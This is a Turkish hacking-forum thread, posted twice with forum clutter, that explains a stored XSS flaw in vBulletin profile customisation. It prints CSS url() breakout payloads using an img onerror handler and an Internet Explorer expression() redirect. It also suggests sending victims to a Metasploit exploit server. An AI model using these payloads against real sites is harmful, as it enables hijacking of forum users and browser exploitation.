vBulletin – A Journey Into 0day Exploitation (0days Kıymetlendirme "Resimli Anlatım")

AizHen · 20-11-2010, 18:23

vBulletin – A Journey Into 0day Exploitation

Anlatım (Megabros)

Forum ve İnternet kullanıcıları arasında önemli bir yeri olan ve Popüleritesini daima üst düzeyde tutan Vbulletin saldırı,karşılama dengesi üzerinde ele alındığında güçsüz olarak görülsede baktığımızda oldukça güvenli bir uygulama olarak bilinmektedir.Her sistemde olduğu gibi Vbulletin sisteminede yeni özellikler eklendiğinde "Profil Özelleştirme" dediğimiz veya diyebileceğimiz yeni sistem açıkları ortaya çıkabilir.

Arkadaşlar burada göreceğimiz gibi gerçek özelleştirme olanağını bir nebze olarakda yakalamak için renk kodlarını bu özelleştirme için kullanmak mümkün olabimektedir "# 000000, RGB kodlarını rgb (255, 255, 255)" hatta bu kodların normal görüntülerindende bu özelleştirmeler elde edilebilir yani kodlar dışındada bu işlem yapılabilmektedir.Herkesin kendi profillerini veya farklı Code'ler ile kendi profillerinin arka kısımlarını değiştirdiklerini bilmekteyiz bu yapacağımız yöntemide böyle düşünebiliriz.

Gördüğünüz gibi Url : ('yol / image.png için') izleyeceğimiz yöntem ve özelleştirme için aslında bu URL uygun fakat bu yöntemin uygulamalarında dahasının olduğunuda bilmek gerekiyor...

Sisteme sızmaya çalışan ve bu özellikleri kullanmak isteyen "Hacker" veya "Defacer" bu sistemi kırmak için Bulletin kullanımına yeni bir özellik eklemeye çalışacak ve bunu kırmaya çalışacaktır.Tabiki bunu yapmak için bir arama diziside kullanılabilir di göreceğimiz üzere 'HaXx "/ \> < arama dizesinin içeriği gerçek bakımdan bakıldığında bir işlevi olmadığı gözükse bile WEB server geçitlerini kırmak için yeterli bir katkı maddesi olarakda görülebilmektedir.
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035

Arkadaşlar yukarıda göreceğimiz gibi Profil özelleştirme desteği ve özelliği (geçersiz) olarak adlandırılmış ve bunların dizeleri belirtilen sistemin içerisinde saklı değilse Sistem Özellikleri düzgün kodlanmamış ise değerleri kötü olarak gösterilebilir.

[/url]

Aklımızda kurduğumuz senaryoda "/" işaretine yani kesme olanağına dayalı olarak kullanılan Javascript uygulamaları içerisinde uygun kullanıcıların veya uygun olmayan kullanıcıların bu değişkenlikleri kullanılabilir hale getirmesinden dolayı eklemeler mümkün olacaktır ve bu eklemelerin yapılması gerekmektedir.Ancak önemli olan Tırnak işareti içerisinde HTML kodlamalarının ne olarak ve hangi işlevde kullanılmasında kullanmak önemlidir.Muhmetelen kullanılan HTML Scriptlerini "Hacker" dediğimiz illegal kullanıcı enjekte olarak kullanmak için bunu bir sağlayıcı olarak kullanabilmesini bilmektedir.Büyük olasılıkla "fonksiyon preg_match" etiketine uyumlu olan bazı sözcük bütünlükleri <script> kodu ile kötü huylu bir hacker kolaylıkla diğer bir etikete bu yolla enjekte edilebilir ama bu yol görüldüğü kadar kolay olmamakla beraber uzaktır.

Burada <script> kullanılmak nedenine geldiğinde Javascript çalıştırmak mümkün olmayabilir.Aslında baktığımızda XSS kullanan bir Defacer için bu büyük bir kozda olabilir.Örnek olarak resim etiketi olarak <img> fonksiyonunu kullanın.Bu durumda görüntü yüklenemez ve yüklemeyen görüntünün size vereceği hata "onerror" olarak gösterilebilmektedir.EventHandler ve EventHandler kısımlarınada Javasicript içeriklerini eklemekte mümkün olmaktadır tabiki.Hattağa Javascript'i engekte etmeden önce basit bir görüntü kullanmak istiyorsanız yani bu anlattığımız sistemin basitçe çalışıp çalışmadığını kontrol etmek istiyorsanız kendinize bir test ortamı yaratarak denemelerde yapabilirsiniz.

Kod:

url(</script><img src="" />)

Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035

Hedef sitenin kaynak kodu sistemin başında görülebileceği gibi bir görüntü yani "saldırı" ile sonradan eklenen kaynak biçimi (src) değişkeni ile beraber girişin doğru çalıştığınıda gözlemliyebiliriz.

JavaScript Kullanımı Hakkında Başarı Sağlama

Özelliklerimizi test ettikten sonra özel dizelerin kodlanmış şekillerininde kodlanması gerektiğini kolayca gösterebilen (iyi) yani en iyi çözüm Encoder ilede yapılabilmekderi "/ * * XSSOR /" bu sistem iş görebilir hızlı ve iyi bir verim olabilirsiniz.Giriş kısmının etkin olmasını istiyorsanız tırnak işareti ile sistemin başlangıcını açmanız gerekiyor.
Bu tür "Merhaba maxe" karakter code'larında kodlanmış son dizesi şu şekilde olabilir, örnek olarak :

Kod:

url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)

Şimdi sırada bu açığı biraz daha araştırdıktan sonra ilk güvenlik açığına bir Hacker'ın dadandığı ortaya çıktı.Bir forum yöneticisi için iyi ve kötü hacker için yapılmış bir sistem olabilir bu sistem.Uygulama geliştiricileri için CSS sayfalarına Javascript enjektesi yapılması mümkün değildir çünkü yapılan yöntemde yanlışlık olduğu bilinmektedir.Tespit edilen ilk güvenlik açığı tarama yapıldıktan sonra yapılan kötü niyetli bir profil için oluşturulmuş ise bypass yöntemleri ile devre dışı bırakılabilmektedir.Hedef kullanıcı için kullanılabilecek en iyi sistem İnternet Explorer 7 ile CSS sayfalarına java script enjekte etmekte mümkün olabilmektedir.Aslında İnternet Explorer 6 sürümüde bu iş için kullanılabilir fakat XSS yöntemi bu yöntem için en uygun sistem olacak gibi gözükmekte

Evet işte bir yönlendirme dizesi, Hacker tarafından kontrol edilebilen kötü niyetli bir kullanıcı profili içine enjekte edilebilir fiili saldırı dizesi şu şekilde olabilir :
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035

Kod:

url(/);width:expression(document.********="http://127.0.0.1:1234")

Buradaki bir yöntemde Locallhost yönlendirme yapmak gerekebilir.Yönlendirme yaparken Metasploit üzerinden Exploit hizmeti veren veya bu exploit hizmeti ile sistemi istismar etmeye çalışan bir hackerıda yönlendirmede kullanmak mümkündür.Yukarıdaki dize sadece buna bir örnek olarak verilebilir.

İnternet Explorer sisteminin eski sürümlerini çalıştıranların yapması gerekenler hacker tarafından kullanıcı profillerinin zarar görmesinden öteye gidebilmektedir.Buradaki yöntem sosyal müdendisliklede bağdaştırılabilir ve kullanıcı profilleri yapılan yöntem ile çözümlenebilir.

Ve İşte XSS ! Tarayıcının Exploit üzerinde olduğunu görebilirsiniz.Açığın ciddiyetini görebilirsiniz yani konuyu yakından incelediyseniz aslında zahmetsiz gelen bu açığın ciddiyetide görülebilmektedir.Bu yöntemde yani senaryoda diyelim hedef kullanıcılarının eski kullandıkları tarayıcılarda kullanımı oldukça yaygındır.Hackerın bu sistemi yani açığı uygulayabilmesi için kullanılan tarayıcının olmasa bile EXPLOİT'in 0day olması gerekmektedir.Tarayıcının sömürücü kitlelerinin yanı sıra hedef İE ve FF saldırı türlerinin bu tarayıcılar üzerinden açığa çıkmasına olanak sağlayabilmektedir.

Yayımlanan Exploitlerin bütünlüğü Exploit-DB,Bugtrag ve InterNOT ile açıklanabilir.Sistemin gereksinimlerine ulaşmak için bu sistemlerede göz atabilir ve gelişmelerden haberdar olabilirsiniz..

Saygılar...

hards · 20-11-2010, 23:16

teşekkürler

20-11-2010, 18:23	#1
AizHen 1st Class WarrioR Kayıt Tarihi: Dec 2006 Üye numarası: #99578 Yer: İstanbul Mesaj sayısı: 4,236 Karma etkisi: 2848 Karma: 283847	vBulletin – A Journey Into 0day Exploitation (0days Kıymetlendirme "Resimli Anlatım") vBulletin – A Journey Into 0day Exploitation Anlatım (Megabros) Forum ve İnternet kullanıcıları arasında önemli bir yeri olan ve Popüleritesini daima üst düzeyde tutan Vbulletin saldırı,karşılama dengesi üzerinde ele alındığında güçsüz olarak görülsede baktığımızda oldukça güvenli bir uygulama olarak bilinmektedir.Her sistemde olduğu gibi Vbulletin sisteminede yeni özellikler eklendiğinde "Profil Özelleştirme" dediğimiz veya diyebileceğimiz yeni sistem açıkları ortaya çıkabilir. Arkadaşlar burada göreceğimiz gibi gerçek özelleştirme olanağını bir nebze olarakda yakalamak için renk kodlarını bu özelleştirme için kullanmak mümkün olabimektedir "# 000000, RGB kodlarını rgb (255, 255, 255)" hatta bu kodların normal görüntülerindende bu özelleştirmeler elde edilebilir yani kodlar dışındada bu işlem yapılabilmektedir.Herkesin kendi profillerini veya farklı Code'ler ile kendi profillerinin arka kısımlarını değiştirdiklerini bilmekteyiz bu yapacağımız yöntemide böyle düşünebiliriz. Gördüğünüz gibi Url : ('yol / image.png için') izleyeceğimiz yöntem ve özelleştirme için aslında bu URL uygun fakat bu yöntemin uygulamalarında dahasının olduğunuda bilmek gerekiyor... Sisteme sızmaya çalışan ve bu özellikleri kullanmak isteyen "Hacker" veya "Defacer" bu sistemi kırmak için Bulletin kullanımına yeni bir özellik eklemeye çalışacak ve bunu kırmaya çalışacaktır.Tabiki bunu yapmak için bir arama diziside kullanılabilir di göreceğimiz üzere 'HaXx "/ \> < arama dizesinin içeriği gerçek bakımdan bakıldığında bir işlevi olmadığı gözükse bile WEB server geçitlerini kırmak için yeterli bir katkı maddesi olarakda görülebilmektedir. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035 Arkadaşlar yukarıda göreceğimiz gibi Profil özelleştirme desteği ve özelliği (geçersiz) olarak adlandırılmış ve bunların dizeleri belirtilen sistemin içerisinde saklı değilse Sistem Özellikleri düzgün kodlanmamış ise değerleri kötü olarak gösterilebilir. [/url] Aklımızda kurduğumuz senaryoda "/" işaretine yani kesme olanağına dayalı olarak kullanılan Javascript uygulamaları içerisinde uygun kullanıcıların veya uygun olmayan kullanıcıların bu değişkenlikleri kullanılabilir hale getirmesinden dolayı eklemeler mümkün olacaktır ve bu eklemelerin yapılması gerekmektedir.Ancak önemli olan Tırnak işareti içerisinde HTML kodlamalarının ne olarak ve hangi işlevde kullanılmasında kullanmak önemlidir.Muhmetelen kullanılan HTML Scriptlerini "Hacker" dediğimiz illegal kullanıcı enjekte olarak kullanmak için bunu bir sağlayıcı olarak kullanabilmesini bilmektedir.Büyük olasılıkla "fonksiyon preg_match" etiketine uyumlu olan bazı sözcük bütünlükleri <script> kodu ile kötü huylu bir hacker kolaylıkla diğer bir etikete bu yolla enjekte edilebilir ama bu yol görüldüğü kadar kolay olmamakla beraber uzaktır. Burada <script> kullanılmak nedenine geldiğinde Javascript çalıştırmak mümkün olmayabilir.Aslında baktığımızda XSS kullanan bir Defacer için bu büyük bir kozda olabilir.Örnek olarak resim etiketi olarak <img> fonksiyonunu kullanın.Bu durumda görüntü yüklenemez ve yüklemeyen görüntünün size vereceği hata "onerror" olarak gösterilebilmektedir.EventHandler ve EventHandler kısımlarınada Javasicript içeriklerini eklemekte mümkün olmaktadır tabiki.Hattağa Javascript'i engekte etmeden önce basit bir görüntü kullanmak istiyorsanız yani bu anlattığımız sistemin basitçe çalışıp çalışmadığını kontrol etmek istiyorsanız kendinize bir test ortamı yaratarak denemelerde yapabilirsiniz. Kod: url(</script><img src="" />) Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035 Hedef sitenin kaynak kodu sistemin başında görülebileceği gibi bir görüntü yani "saldırı" ile sonradan eklenen kaynak biçimi (src) değişkeni ile beraber girişin doğru çalıştığınıda gözlemliyebiliriz. JavaScript Kullanımı Hakkında Başarı Sağlama Özelliklerimizi test ettikten sonra özel dizelerin kodlanmış şekillerininde kodlanması gerektiğini kolayca gösterebilen (iyi) yani en iyi çözüm Encoder ilede yapılabilmekderi "/ * * XSSOR /" bu sistem iş görebilir hızlı ve iyi bir verim olabilirsiniz.Giriş kısmının etkin olmasını istiyorsanız tırnak işareti ile sistemin başlangıcını açmanız gerekiyor. Bu tür "Merhaba maxe" karakter code'larında kodlanmış son dizesi şu şekilde olabilir, örnek olarak : Kod: url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />) Şimdi sırada bu açığı biraz daha araştırdıktan sonra ilk güvenlik açığına bir Hacker'ın dadandığı ortaya çıktı.Bir forum yöneticisi için iyi ve kötü hacker için yapılmış bir sistem olabilir bu sistem.Uygulama geliştiricileri için CSS sayfalarına Javascript enjektesi yapılması mümkün değildir çünkü yapılan yöntemde yanlışlık olduğu bilinmektedir.Tespit edilen ilk güvenlik açığı tarama yapıldıktan sonra yapılan kötü niyetli bir profil için oluşturulmuş ise bypass yöntemleri ile devre dışı bırakılabilmektedir.Hedef kullanıcı için kullanılabilecek en iyi sistem İnternet Explorer 7 ile CSS sayfalarına java script enjekte etmekte mümkün olabilmektedir.Aslında İnternet Explorer 6 sürümüde bu iş için kullanılabilir fakat XSS yöntemi bu yöntem için en uygun sistem olacak gibi gözükmekte Evet işte bir yönlendirme dizesi, Hacker tarafından kontrol edilebilen kötü niyetli bir kullanıcı profili içine enjekte edilebilir fiili saldırı dizesi şu şekilde olabilir : Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=441035 Kod: url(/);width:expression(document.********="http://127.0.0.1:1234") Buradaki bir yöntemde Locallhost yönlendirme yapmak gerekebilir.Yönlendirme yaparken Metasploit üzerinden Exploit hizmeti veren veya bu exploit hizmeti ile sistemi istismar etmeye çalışan bir hackerıda yönlendirmede kullanmak mümkündür.Yukarıdaki dize sadece buna bir örnek olarak verilebilir. İnternet Explorer sisteminin eski sürümlerini çalıştıranların yapması gerekenler hacker tarafından kullanıcı profillerinin zarar görmesinden öteye gidebilmektedir.Buradaki yöntem sosyal müdendisliklede bağdaştırılabilir ve kullanıcı profilleri yapılan yöntem ile çözümlenebilir. Ve İşte XSS ! Tarayıcının Exploit üzerinde olduğunu görebilirsiniz.Açığın ciddiyetini görebilirsiniz yani konuyu yakından incelediyseniz aslında zahmetsiz gelen bu açığın ciddiyetide görülebilmektedir.Bu yöntemde yani senaryoda diyelim hedef kullanıcılarının eski kullandıkları tarayıcılarda kullanımı oldukça yaygındır.Hackerın bu sistemi yani açığı uygulayabilmesi için kullanılan tarayıcının olmasa bile EXPLOİT'in 0day olması gerekmektedir.Tarayıcının sömürücü kitlelerinin yanı sıra hedef İE ve FF saldırı türlerinin bu tarayıcılar üzerinden açığa çıkmasına olanak sağlayabilmektedir. Yayımlanan Exploitlerin bütünlüğü Exploit-DB,Bugtrag ve InterNOT ile açıklanabilir.Sistemin gereksinimlerine ulaşmak için bu sistemlerede göz atabilir ve gelişmelerden haberdar olabilirsiniz.. Saygılar...

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama

Bu Konuda Aradığınızı Bulamadıysanız Şunlara Bakmanızı Öneririz
Konu	Konu Yazarı	Forum	Cevaplar	Son Mesaj
Gorsel C#.net - Visual Studio.NET - ASP.NET Egitim Seti	betho	Asp.NET - C# - VB.net	38	05-04-2012 21:24
C#,ASP.Net görsel eğitim seti	Mr. No	Asp.NET - C# - VB.net	21	24-01-2011 12:47
Complete Do It Yourself (DIY) Tutorials – 159 eBooks	TechniQue	E-book	0	02-09-2009 05:39
Delphi 7 Türkçe Görsel Eğitim Seti	xxx_x	Programlar	1	20-04-2009 06:35
2008-2009 Sezonu Transfer Dosyasi	José_Mourınho	Beşiktaş, Trabzonspor ve Diğerleri...	5	08-07-2008 20:54

20-11-2010, 23:16	#2
hards Çırak Kayıt Tarihi: Oct 2010 Üye numarası: #489401 Mesaj sayısı: 12 Karma etkisi: 0 Karma: 10	teşekkürler

Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)